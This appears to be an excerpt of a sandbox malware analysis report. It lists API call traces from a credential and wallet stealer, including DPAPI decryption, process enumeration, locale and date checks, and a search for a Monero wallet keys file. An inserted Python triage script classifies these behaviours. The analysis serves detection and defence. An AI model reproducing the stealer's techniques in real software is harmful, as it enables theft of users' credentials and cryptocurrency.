                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 82585e73b8e30902db18f8256bb01da8f82b9b5d92630d02978c23e3726121fd
                                    • Instruction ID: 236470e3cac2951657fdd0384ac09ffe302121ea359398a50e9d102cf21fbc7a
                                    • Opcode Fuzzy Hash: 82585e73b8e30902db18f8256bb01da8f82b9b5d92630d02978c23e3726121fd
                                    • Instruction Fuzzy Hash: 71126D31A001589EDB18FB61DD96EED7339AF59300F4141A9B50AB6193EF307F49CBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7$}$9?k?$Aiog$Ln=$o[\>${>}
                                    • API String ID: 0-2663664130
                                    • Opcode ID: 72f93571901978973c47ac5121d01cfc0fee5934ffcd57b0bd50902c3a70b92c
                                    • Instruction ID: d4126c8ef3cf9fbb4417ef80f4bfe97d0ef51c0e4d7b6bb9e97281f1f62c40e5
                                    • Opcode Fuzzy Hash: 72f93571901978973c47ac5121d01cfc0fee5934ffcd57b0bd50902c3a70b92c
                                    • Instruction Fuzzy Hash: D9B225F360C2049FE304AE2DEC8567ABBE9EF94320F16893DE6C4C7744E63598058697
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,000D4EEE,00000000,?), ref: 000D9B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9B2A
                                    • LocalFree.KERNEL32(?,?,?,?,000D4EEE,00000000,?), ref: 000D9B3F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID: N
                                    • API String ID: 4291131564-4101671594
                                    • Opcode ID: 342072b1ddee2f77ab9a9a5343f12706a951df58b8f83b39b55d3c2cc1077e24
                                    • Instruction ID: 152805adb9516862453635837a2a4ea99b152f1cf2e13aa0edc21d1931d4cf00
                                    • Opcode Fuzzy Hash: 342072b1ddee2f77ab9a9a5343f12706a951df58b8f83b39b55d3c2cc1077e24
                                    • Instruction Fuzzy Hash: 9E11D4B4241308AFEB00CF64CC95FAA77B9FB89715F208049F9159B390C771A901CB50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \}]m$j]w/$nt7$zj{$4Xa
                                    • API String ID: 0-334726920
                                    • Opcode ID: 8944e06c13effbdbf1747e3b722e02f6e5c2be44e9cf6540886055840417e6e9
                                    • Instruction ID: 67934872216c9e0c66193652fc11183fb29cb95cb9155646517d8cda35911c12
                                    • Opcode Fuzzy Hash: 8944e06c13effbdbf1747e3b722e02f6e5c2be44e9cf6540886055840417e6e9
                                    • Instruction Fuzzy Hash: 9BB2E2F3A0C2049FE304AE29EC8567AF7E9EF94720F16493DEAC5C7740E63598448697
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000DC871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000DC87C
                                    • lstrcat.KERNEL32(?,000F0B46), ref: 000DC943
                                    • lstrcat.KERNEL32(?,000F0B47), ref: 000DC957
                                    • lstrcat.KERNEL32(?,000F0B4E), ref: 000DC978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 4847e928e3236748f30701c9a2aa457a14bde205b01bcdcd5b3674010fe1a5d3
                                    • Instruction ID: 1088ae9868a952eade159863b931c06383fe599a80d8c7337f164f57f3f22080
                                    • Opcode Fuzzy Hash: 4847e928e3236748f30701c9a2aa457a14bde205b01bcdcd5b3674010fe1a5d3
                                    • Instruction Fuzzy Hash: 5A416E7990421EDFDB10DFA0DD89BFEF7B8AB48305F1041A9E609A6280D7705A85CFA1
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 000E696C
                                    • sscanf.NTDLL ref: 000E6999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000E69B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000E69C0
                                    • ExitProcess.KERNEL32 ref: 000E69DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: aed4c78c206e47549af2c983ff89aec61227d6132fd07c18139d931521d00d47
                                    • Instruction ID: fca47f08656caec2b8a11a5c0b6f008704ca13ff2c8dbc4d9d3169d57f56eb0b
                                    • Opcode Fuzzy Hash: aed4c78c206e47549af2c983ff89aec61227d6132fd07c18139d931521d00d47
                                    • Instruction Fuzzy Hash: B221EA75D10208AFCF05EFE4E9459EEB7B9BF4C301F04852AE406B3251EB355605CB65
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000D724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000D7254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000D7281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000D72A4
                                    • LocalFree.KERNEL32(?), ref: 000D72AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: f5bca64d642ad3ad3e29e9c43118725da9e5b6da84f21befcdf46dc3197e6d08
                                    • Instruction ID: 4be24e3ed0b8ffb69ab85bcf00eaf183ec8599af5b5a4e75041fb37d237a7d62
                                    • Opcode Fuzzy Hash: f5bca64d642ad3ad3e29e9c43118725da9e5b6da84f21befcdf46dc3197e6d08
                                    • Instruction Fuzzy Hash: 9C011275A41308BBEB10DFD8CD45FEE77B8EB48701F108155FB05AB2C0D670AA008B65
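Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python triage helper that parses function records in the text form used on this page (the "APIs" bullet list of each record, with its "ref:" call-site addresses) and maps the APIs each function calls directly to the stealer behaviours those call sequences imply: the keyboard-layout/locale check, the directory walk that reaches `\Monero\wallet.keys`, the two-call `CryptStringToBinaryA` decode, the `GetSystemTime`/`SystemTimeToFileTime`/`ExitProcess` date gate, and the `CryptUnprotectData` decrypt. The record grammar, the behaviour labels and the rule table are this example's own assumptions; the sample input is constructed from API lines copied from the records above and trimmed to what the parser needs.

```python
"""Triage helper for per-function records exported from a Joe Sandbox report.

Added example for this page; it is not Joe Sandbox code. The behaviour
labels below are this example's own shorthand, not sandbox signatures.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: API lines copied from the function records on this
# page (locale check, wallet directory walk, base64 decode, date gate, DPAPI).
SAMPLE = r"""
APIs
  • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
• GetKeyboardLayoutList.USER32(00000000,00000000,000F05AF), ref: 000E7BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 000E7BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 000E7C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000E7C62
• LocalFree.KERNEL32(00000000), ref: 000E7D22
Similarity
• API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
APIs
  • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000F0D73), ref: 000DE4A2
• StrCmpCA.SHLWAPI(?,000F14F8), ref: 000DE4F2
• FindNextFileA.KERNEL32(000000FF,?), ref: 000DEBDF
Similarity
• API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
APIs
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9AEF
• LocalAlloc.KERNEL32(00000040,?,?,?,000D4EEE,00000000,?), ref: 000D9B01
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9B2A
• LocalFree.KERNEL32(?,?,?,?,000D4EEE,00000000,?), ref: 000D9B3F
APIs
• GetSystemTime.KERNEL32(?), ref: 000E696C
• sscanf.NTDLL ref: 000E6999
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000E69B2
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000E69C0
• ExitProcess.KERNEL32 ref: 000E69DA
APIs
• GetProcessHeap.KERNEL32(00000008,00000400), ref: 000D724D
• RtlAllocateHeap.NTDLL(00000000), ref: 000D7254
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000D7281
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000D72A4
• LocalFree.KERNEL32(?), ref: 000D72AE
"""

# One API bullet: optional "Part of subcall function <addr>:" prefix,
# "<Api>.<MODULE>", optional "(args)", then "ref: <call-site address>".
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*"
    r"ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
API_ID_LINE = re.compile(r"^\s*•\s*API ID:\s*(?P<id>.*?)\s*$")

# Assumed rule table: every API in the set must be called directly by the function.
BEHAVIOUR_RULES = [
    ("locale check via keyboard layouts", {"GetKeyboardLayoutList", "GetLocaleInfoA"}),
    ("date-gated execution", {"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"}),
    ("DPAPI decryption", {"CryptUnprotectData"}),
    ("process enumeration", {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}),
    ("directory walk", {"FindFirstFileA", "FindNextFileA"}),
    ("base64 decode", {"CryptStringToBinaryA"}),
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address when the call sits in a subroutine


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""

    def label(self) -> str:
        """Address of the first direct call site, used as the record key."""
        if not self.calls:
            return "?"
        direct = [c for c in self.calls if c.subcall is None]
        return (direct or self.calls)[0].ref

    def direct_apis(self) -> set:
        return {c.api for c in self.calls if c.subcall is None}

    def all_args(self) -> List[str]:
        return [a for c in self.calls for a in c.args]


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the export on 'APIs' headers and collect each record's call bullets."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                         m.group("ref").upper(), m.group("sub")))
            continue
        m = API_ID_LINE.match(line)
        if m:
            current.api_id = m.group("id")
    return records


def classify(record: FunctionRecord) -> List[str]:
    apis = record.direct_apis()
    tags = [name for name, needed in BEHAVIOUR_RULES if needed <= apis]
    # String arguments reach the record through subcalls too, so scan all of them.
    for arg in record.all_args():
        if "wallet" in arg.lower():
            tags.append("targets wallet path " + arg)
    return tags


def triage(text: str) -> dict:
    """Map each record's first direct call-site address to its behaviour tags."""
    return {rec.label(): classify(rec) for rec in parse_records(text)}


if __name__ == "__main__":
    for addr, tags in triage(SAMPLE).items():
        print(addr, "->", ", ".join(tags) or "(no rule matched)")
```

The rule table keys on direct calls only, so that a helper such as `lstrcpy` reached through a subcall does not tag every caller; string arguments are scanned across subcalls as well, which is how the `\Monero\wallet.keys` path surfaces on the directory-walk function even though `lstrlen` is called one level down.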
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E961E
                                    • Process32First.KERNEL32(000F0ACA,00000128), ref: 000E9632
                                    • Process32Next.KERNEL32(000F0ACA,00000128), ref: 000E9647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 000E965C
                                    • CloseHandle.KERNEL32(000F0ACA), ref: 000E967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 3df19ee1163632635fe72e14811dfb9e27c1725658c0270ec2def9f526342199
                                    • Instruction ID: 8d503dc4b6d77a3f5c6dd1da5da35061e8bffda9c1372adef7502f4650fb349f
                                    • Opcode Fuzzy Hash: 3df19ee1163632635fe72e14811dfb9e27c1725658c0270ec2def9f526342199
                                    • Instruction Fuzzy Hash: ED011E75A11208EFCB25DFA5CD48BEDBBF8EB4C301F10819AA905A7290D7349B40DF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &j?$+w$hD.=$}o
                                    • API String ID: 0-3985561175
                                    • Opcode ID: e74c01117dce0f193ad8546d82a245d2ced773095e04998c779c0d68fa72d7e5
                                    • Instruction ID: 76f67579c7c5c762976cc1f446a0e6ab50cdfff61e8ddf4aff092792d257dd38
                                    • Opcode Fuzzy Hash: e74c01117dce0f193ad8546d82a245d2ced773095e04998c779c0d68fa72d7e5
                                    • Instruction Fuzzy Hash: A3B2D8F360C200AFE3046E2DEC8567ABBE9EF94720F16493DEAC4D7744E63558058697
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,000D5184,40000001,00000000,00000000,?,000D5184), ref: 000E8EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: d483d9dfc9eefb909eaef438c44f8d43c7dc4395524cd14caa74787ad8de83f4
                                    • Instruction ID: fdf70fd110b58ba93dbc9306ae091da03468835d96f80a6f7c6ed16407a9aca6
                                    • Opcode Fuzzy Hash: d483d9dfc9eefb909eaef438c44f8d43c7dc4395524cd14caa74787ad8de83f4
                                    • Instruction Fuzzy Hash: FE111570200248BFDB50CF65E884FAB37A9AF89301F10D558F9199B261DB35EC41DB60
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00B7F208,00000000,?,000F0E10,00000000,?,00000000,00000000), ref: 000E7A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E7A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00B7F208,00000000,?,000F0E10,00000000,?,00000000,00000000,?), ref: 000E7A7D
                                    • wsprintfA.USER32 ref: 000E7AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 89a19c3b460ce8c20773fb748d4fab584e80fd6fc6438b6949c6bc4639652fd9
                                    • Instruction ID: ecd30e6f169a71decdcbe729bdca6cb1b7f526d059b27866eeafe691ccf30ae2
                                    • Opcode Fuzzy Hash: 89a19c3b460ce8c20773fb748d4fab584e80fd6fc6438b6949c6bc4639652fd9
                                    • Instruction Fuzzy Hash: 961170B1946618DFDB208B55DC45FA9BBB8F744721F1043A6E60AA3280D7741A40CB52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: /rq=$cQc{$x+O
                                    • API String ID: 0-1627834019
                                    • Opcode ID: 3422d5627424fa53747f63c41b821b96f680e4669cda163d976af818173520d4
                                    • Instruction ID: 07237514e6465390937b255cdb90930ed3db4ed11f1dd4d7c3c160425ce6bd38
                                    • Opcode Fuzzy Hash: 3422d5627424fa53747f63c41b821b96f680e4669cda163d976af818173520d4
                                    • Instruction Fuzzy Hash: 2EB227F390C2049FE3046E2DEC8567ABBE9EB94720F1A493DEAC5D7740EA3558018797
                                    APIs
                                    • CoCreateInstance.COMBASE(000EE118,00000000,00000001,000EE108,00000000), ref: 000E3758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000E37B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: 4eb80bd380e06baed71b9079723681e24fa87dcf1f2750bcda0913876d0911c2
                                    • Instruction ID: 1d5c5ebafabf91d87d1bfa1fc5447ca51cea24bf04059fb28b8134e77599c3a2
                                    • Opcode Fuzzy Hash: 4eb80bd380e06baed71b9079723681e24fa87dcf1f2750bcda0913876d0911c2
                                    • Instruction Fuzzy Hash: 0841C770A40A289FDB24DB58CC99BDBB7B5BB48702F4091D8E609AB2D0D7716EC5CF50
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000D9B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 000D9BA3
                                    • LocalFree.KERNEL32(?), ref: 000D9BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
